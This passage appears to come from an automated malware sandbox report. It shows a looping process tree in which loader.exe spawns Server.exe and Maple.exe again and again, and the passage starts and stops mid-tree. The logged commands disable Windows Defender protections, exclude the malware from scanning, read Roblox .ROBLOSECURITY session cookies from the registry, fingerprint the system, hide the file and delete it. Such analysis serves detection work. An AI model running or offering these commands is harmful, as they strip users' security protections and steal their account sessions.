                                                                                                                                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                    29⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:1336
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                    29⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:1912
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                    29⤵
                                                                                                                                                                                      PID:4464
                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                      "wmic.exe" os get Caption
                                                                                                                                                                                      29⤵
                                                                                                                                                                                        PID:5080
                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                        29⤵
                                                                                                                                                                                          PID:2172
                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                                                                                          29⤵
                                                                                                                                                                                            PID:2628
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                            29⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:4124
                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                            "wmic" path win32_VideoController get name
                                                                                                                                                                                            29⤵
                                                                                                                                                                                            • Detects videocard installed
                                                                                                                                                                                            PID:1260
                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                            29⤵
                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                            PID:1880
                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                              ping localhost
                                                                                                                                                                                              30⤵
                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:1460
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                          28⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          PID:4964
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                            29⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:4112
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                            29⤵
                                                                                                                                                                                              PID:1572
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                              29⤵
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              PID:4656
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                30⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:3184
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                30⤵
                                                                                                                                                                                                  PID:3528
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                  30⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  PID:2704
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:404
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                                                                                      32⤵
                                                                                                                                                                                                        PID:1884
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                        PID:2700
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                          PID:1920
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:4360
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:4516
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                          32⤵
                                                                                                                                                                                                            PID:4176
                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                            "wmic.exe" os get Caption
                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                              PID:1776
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                PID:1628
                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                  PID:3676
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                                  PID:1268
                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                  PID:3180
                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                    ping localhost
                                                                                                                                                                                                                    33⤵
                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                    PID:1632
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                PID:2744
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                  PID:3648
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                    PID:2708
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                    PID:3656
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:3348
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                        PID:2628
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                        33⤵
                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:2744
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                          PID:4564
                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                            35⤵
                                                                                                                                                                                                                              PID:1460
                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                              35⤵
                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                              PID:4360
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                              35⤵
                                                                                                                                                                                                                                PID:2604
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                35⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:3676
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                35⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:3508
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                35⤵
                                                                                                                                                                                                                                  PID:3100
                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                  "wmic.exe" os get Caption
                                                                                                                                                                                                                                  35⤵
                                                                                                                                                                                                                                    PID:2140
                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                    "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                    35⤵
                                                                                                                                                                                                                                      PID:2352
                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                      35⤵
                                                                                                                                                                                                                                        PID:3172
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                        "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                        • Detects videocard installed
                                                                                                                                                                                                                                        PID:1708
                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                        PID:1480
                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                          ping localhost
                                                                                                                                                                                                                                          36⤵
                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                          PID:3104
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                      34⤵
                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                      PID:3064
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                        PID:3204
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                                          PID:4292
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                          35⤵
                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                          PID:2144
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                            PID:2696
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                                                              PID:1424
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                              36⤵
                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                              PID:4252
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                37⤵
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                PID:1720
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                37⤵
                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                PID:3136
                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                  "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                                                                    PID:4064
                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                                                                      PID:3196
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                      38⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      PID:2704
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                      38⤵
                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                      PID:3572
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                      38⤵
                                                                                                                                                                                                                                                        PID:848
                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                        "wmic.exe" os get Caption
                                                                                                                                                                                                                                                        38⤵
                                                                                                                                                                                                                                                          PID:3276
                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                          "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                          38⤵
                                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                            38⤵
                                                                                                                                                                                                                                                              PID:1272
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                              PID:972
                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                              "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                                                              • Detects videocard installed
                                                                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                              PID:3648
                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                ping localhost
                                                                                                                                                                                                                                                                39⤵
                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                            37⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            PID:3436
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:4268
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                              38⤵
                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                38⤵
                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                PID:2348
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                  PID:1992
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                                  PID:892
                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                    "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                      PID:3356
                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                      40⤵
                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                      PID:4464
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                      40⤵
                                                                                                                                                                                                                                                                        PID:2784
                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                        40⤵
                                                                                                                                                                                                                                                                          PID:3212
                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                                                                                            PID:2096
                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                                                                                              PID:4700
                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                              "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                              40⤵
                                                                                                                                                                                                                                                                                PID:436
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                40⤵
                                                                                                                                                                                                                                                                                  PID:4476
                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                  "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                  40⤵
                                                                                                                                                                                                                                                                                    PID:3872
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                    PID:4584
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                    "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                                                                                                    PID:748
                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                    PID:2752
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                      ping localhost
                                                                                                                                                                                                                                                                                      41⤵
                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
